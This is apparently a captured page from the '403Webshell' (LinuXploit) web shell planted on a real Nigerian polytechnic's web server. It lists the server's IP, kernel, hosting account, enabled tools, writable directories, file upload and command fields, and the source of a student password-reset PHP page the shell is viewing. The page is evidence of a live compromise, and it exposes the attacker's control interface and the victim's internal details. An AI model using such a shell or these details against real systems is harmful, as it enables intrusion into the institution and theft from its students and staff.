403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.69.58.211
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_student/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_student/forgetPass.php
<?php
/**
 * Created by PhpStorm.
 * User: adisa
 * Date: 3/2/2016
 * Time: 3:31 PM
 */
//session_start();
ob_start();
include('headMain.php');
if(!isset($_SESSION['matNo'])){
header('location:../login.php');
}

?>
<div id="wrapper">
    <table width="100%" cellspacing="5" cellpadding="3">
    <tr>
        <td><form id="form1" name="form1" method="post" action="forgetPassword.php" role="form" >
                <fieldset>
                    <legend>
                        <div class="row">
                            <div class="col-lg-3"></div>
                            <div class="col-lg-6">
                                <div class="panel panel-default">
                                    <div class="panel-heading">
                                        Change Password (<?php echo $_SESSION['matNo'] ;?>)
                                    </div>
                                    <div class="panel-body">

                                        <div class="row">
                                            <div class="col-lg-12">
                                                <form role="form">
                        <table width="100%" cellspacing="5" cellpadding="3">
                            <tr>
                                <?php

                                    if (isset($_GET['id'])){
                                        if ($_GET['id']==1){
                                            echo '<td colspan="3"  class="alert alert-success"  align="center" ><button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>Your Login Details has been Sent';
                                        }elseif($_GET['id']==2){
                                            echo ' <td colspan="3" class="alert alert-danger"  align="center" ><button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>No Record Found';
                                        }elseif($_GET['id']==3){
                                            echo  ' <td colspan="3" class="alert alert-danger" align="center" ><button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>Password Mismatch';
                                        }
                                    }
                                    ?>
                                    </td>
                            </tr>

                            <tr>
                                <td>Enter Your Matric No.</td>
                                <td>&nbsp;</td>
                                <td><label for="matNo"></label>
                                    <input class="form-control" type="text" name="matNo" id="txtRound" required="required" /></td>
                            </tr>
                            <tr>
                                <td>.</td>
                            </tr>
                            <tr>
                                <td></td>
                                <td>&nbsp;</td>
                                <td><label for="npasswordb"></label>
                                    <input class="btn btn-primary" type="submit" name="button" id="button" value="Send Login Detail" /></td>
                            </tr>
                        </table>
                                                    </div>
                                            </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </legend>



                </fieldset>
            </form></td>
    </tr>
    </table>
<?php
include('footMain.php');
?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit